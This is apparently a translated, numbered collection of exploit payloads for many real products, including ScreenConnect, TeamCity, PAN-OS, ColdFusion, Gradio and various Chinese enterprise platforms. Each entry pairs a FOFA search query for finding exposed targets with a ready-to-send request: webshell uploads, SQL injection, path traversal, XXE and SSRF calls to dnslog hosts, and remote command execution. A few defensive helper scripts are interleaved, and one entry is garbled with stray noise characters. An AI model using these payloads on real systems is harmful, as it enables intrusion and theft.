FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

Resulting file: http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage:
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

Once the user has been created, log straight into the admin backend; from there system commands can be executed.

126. aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

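The request in entry 126 works because the static-file handler joins the requested path onto its root and never checks that the result still lies inside it. The following is an added example, not aiohttp's or ComfyUI's code: a minimal resolver in both the broken and the hardened form. The static root (/srv/app/static) and the /static mount prefix are assumed for illustration.

```python
import posixpath
from urllib.parse import unquote

# Assumed static root for the example; the real directory depends on the application.
STATIC_ROOT = "/srv/app/static"


def path_from_request_target(target: str, mount: str = "/static") -> str:
    """Strip the mount prefix and percent-decode, in that order, as a server routing layer does."""
    if not target.startswith(mount + "/"):
        raise ValueError("target is not under the static mount")
    return unquote(target[len(mount) + 1:])


def naive_resolve(root: str, rel: str) -> str:
    """What a broken static handler does: join and normalize, so '..' segments walk out of root."""
    return posixpath.normpath(posixpath.join(root, rel.lstrip("/")))


def safe_resolve(root: str, rel: str):
    """Resolve rel under root; return None unless the normalized result stays inside root.

    The containment test runs on the normalized path (after '..', '.' and duplicate
    slashes are collapsed) and compares against root plus a trailing separator, so a
    sibling directory such as /srv/app/static2 cannot pass as /srv/app/static.
    """
    root = posixpath.normpath(root)
    candidate = posixpath.normpath(posixpath.join(root, rel.lstrip("/")))
    if candidate == root or candidate.startswith(root + "/"):
        return candidate
    return None


if __name__ == "__main__":
    probe = "/static/../../../../../etc/passwd"   # the request line from entry 126
    rel = path_from_request_target(probe)
    print("naive :", naive_resolve(STATIC_ROOT, rel))          # escapes to /etc/passwd
    print("safe  :", safe_resolve(STATIC_ROOT, rel))           # None: rejected
    print("normal:", safe_resolve(STATIC_ROOT, "css/app.css"))  # served
```

Decoding before normalization matters: a `%2e%2e` variant that is normalized first and decoded afterwards would pass the check and still escape on disk.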
127. Glodon (广联达) Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Affected: Adobe ColdFusion 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier)
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read /etc/passwd, sending the uuid from step 1 in the uuid header
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <= 20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin backend: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "<username>", "password": "<password>", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

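For defenders, the two TeamCity issues in entry 132 leave distinctive traces in the web server access log: a `;.jsp` path parameter (CVE-2024-27198) and a `..` walk from one of the unauthenticated prefixes into /admin/ (CVE-2024-27199). The following added example, which is not JetBrains' code or a vendor tool, scans access-log lines for both patterns. The sample lines are constructed, and the combined-log format and the list of unauthenticated prefixes (taken from the three paths above) are assumptions.

```python
import posixpath
import re
from urllib.parse import unquote, urlsplit

# Constructed sample lines in combined-log style; none of this is real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [05/Mar/2024:10:01:02 +0000] "POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1" 200 512
10.0.0.5 - - [05/Mar/2024:10:01:03 +0000] "GET /res/../admin/diagnostic.jsp HTTP/1.1" 200 9001
10.0.0.5 - - [05/Mar/2024:10:01:04 +0000] "GET /.well-known/acme-challenge/../../admin/diagnostic.jsp HTTP/1.1" 200 9001
10.0.0.6 - - [05/Mar/2024:10:01:05 +0000] "GET /update/%2e%2e/admin/diagnostic.jsp HTTP/1.1" 200 9001
10.0.0.7 - - [05/Mar/2024:10:02:00 +0000] "GET /app/rest/users HTTP/1.1" 401 0
10.0.0.7 - - [05/Mar/2024:10:02:01 +0000] "GET /res/img/logo.png HTTP/1.1" 200 2048
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Prefixes served without authentication, as listed for CVE-2024-27199 on this page.
UNAUTH_PREFIXES = ("/res/", "/.well-known/acme-challenge/", "/update/")
# A ';' path parameter whose value ends in '.jsp' (the PoC puts it in the jsp= query value).
JSP_PARAM_RE = re.compile(r";[^/?&]*\.jsp(?=[?&#]|$)", re.IGNORECASE)


def classify_target(target: str):
    """Return the rule name a request target trips, or None."""
    # CVE-2024-27198: the auth filter sees a static '.jsp' resource, the dispatcher
    # forwards to the path named by jsp=, so /app/rest/users is reached unauthenticated.
    if JSP_PARAM_RE.search(target):
        return "CVE-2024-27198 ';.jsp' path-parameter bypass"
    # CVE-2024-27199: an unauthenticated prefix plus '..' segments that resolve into /admin/.
    decoded = unquote(urlsplit(target).path)
    normalized = posixpath.normpath(decoded)
    if decoded.startswith(UNAUTH_PREFIXES) and normalized != decoded and normalized.startswith("/admin/"):
        return "CVE-2024-27199 traversal from unauthenticated prefix"
    return None


def scan_log(text: str):
    """Return (line_number, client_ip, target, rule) for each line that matches a rule."""
    hits = []
    for number, line in enumerate(text.splitlines(), 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        rule = classify_target(match.group("target"))
        if rule:
            hits.append((number, line.split(" ", 1)[0], match.group("target"), rule))
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

Normalizing after percent-decoding is what catches the `%2e%2e` variant on line 4; a literal match on `/../` would miss it. A 200 on a diagnostic.jsp or /app/rest/users request that the log attributes to one of these prefixes is the signal to pull the TeamCity audit log for new users and tokens.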
133. H5 cloud mall (H5 云商城) file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. Netentsec (网康) NS-ASG Application Security Gateway index.php SQL injection
CVE-2024-2330
Affected: Netentsec NS-ASG Application Security Gateway 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. Netentsec (网康) NS-ASG Application Security Gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Affected: Netentsec NS-ASG Application Security Gateway 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. Kirisun (福建科立讯) communication command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. Kirisun (福建科立讯) communication command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. Kirisun (福建科立讯) communication command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. Kirisun (福建科立讯) communication command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. Kirisun (福建科立讯) communication command and dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA:body="/808gps/"
Credentials: admin/admin

143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

1 s$ ^* s3 q! R* k" f5 T' H- L144. D-Link nas_sharing.cgi 命令注入0 Q4 U; U/ B2 h3 Q, b
FOFA:app="D_Link-DNS-ShareCenter"
# g- K" G" G2 f' N" v: g( esystem参数用于传要执行的命令1 t$ I+ n- a8 s5 d  T
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
; z; W! |4 z2 l9 WHost: x.x.x.x' {4 E6 W' y# z/ C9 ^; X; ?
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
3 a' }7 o4 o( p+ L$ JConnection: close8 V8 o: H  Q% G8 d
Accept: */*
/ n7 c9 y& Q% B) b& w: i: {! EAccept-Language: en0 U/ l) j2 \8 s- p. G: l
Accept-Encoding: gzip
$ [+ ~( E( f0 e0 |) l3 s; a2 D+ M. K0 b9 G$ U1 I7 }: `

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}<dnslog address>`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Conn# Connection: close

148. CrushFTP authentication bypass and template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
Affected: LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter, i.e. the injected shell command is placed in the Basic-auth username
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

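Entries 122, 144 and 152 all hide the injected SQL or shell command behind base64 (the sql= and system= parameters and the Basic-auth username), so a signature on the literal keyword never fires. As an added triage helper that is not part of the original post, the function below takes a raw request, pulls out query parameters, form fields and the Authorization header, and reports the ones that decode to printable text. The request texts are copied from those three entries with the noise headers dropped; the length-mod-4, UTF-8 and printability filters are the assumed heuristics for rejecting ordinary words that happen to be valid base64.

```python
import base64
import binascii
from urllib.parse import unquote

# Requests from entries 122, 144 and 152 on this page, headers trimmed.
REQ_122 = ("GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1\r\n"
           "Host: x.x.x.x\r\n\r\n")
REQ_144 = ("GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1\r\n"
           "Host: x.x.x.x\r\n\r\n")
REQ_152 = ("GET /access/set?param=enableapi&value=1 HTTP/1.1\r\n"
           "Host: x.x.x.x\r\n"
           "Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=\r\n\r\n")


def try_b64(value: str):
    """Decode value as standard or URL-safe base64 if, and only if, it yields printable text."""
    s = value.strip().replace("-", "+").replace("_", "/")
    if len(s) < 2 or len(s) % 4 == 1:      # no valid base64 string has length 1 mod 4
        return None
    s += "=" * (-len(s) % 4)                # tolerate stripped padding (entry 144's passwd)
    try:
        text = base64.b64decode(s, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    if not text or not all(c.isprintable() or c in "\r\n\t" for c in text):
        return None                         # random bytes, not an encoded command
    return text


def split_request(raw: str):
    """Return (method, target, headers, body) from raw HTTP/1.x request text."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    method, target, _ = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body


def decode_b64_params(raw: str):
    """Map parameter or header names to the decoded base64 payloads they carry."""
    _, target, headers, body = split_request(raw)
    candidates = []
    query = target.partition("?")[2]
    if query:
        candidates += query.split("&")
    if headers.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        candidates += body.strip().split("&")
    found = {}
    for pair in candidates:
        name, _, value = pair.partition("=")   # split at the first '=' so padding survives
        decoded = try_b64(unquote(value))
        if decoded is not None:
            found[name] = decoded
    auth = headers.get("authorization", "")
    if auth.lower().startswith("basic "):
        decoded = try_b64(auth[6:])
        if decoded is not None:
            found["Authorization"] = decoded
    return found


if __name__ == "__main__":
    for req in (REQ_122, REQ_144, REQ_152):
        print(decode_b64_params(req))
```

The same helper applied to entry 146 would expose `url=cnRzcDovL2EK` as an `rtsp://` URL; the `mdc=` parameter in entry 156 is plain percent-encoding and needs only `unquote`.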
153. Gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request /config to obtain the component ids
http://x.x.x.x/config

Step 2: have the server copy /etc/passwd into a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.15 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: fetch the cached copy
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. Tianweier (天维尔) fire and rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. LyLme Spage (六零导航页) file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

Access the file path returned in the response: http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

The mdc value in the request above URL-decodes to: echo; echo asrgkjh0 > /var/example.txt; ls -l /var; echo ----------------; cat /var/example.txt;
The only "authentication" is the Cookie: uid=1 header.

157. 美特CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
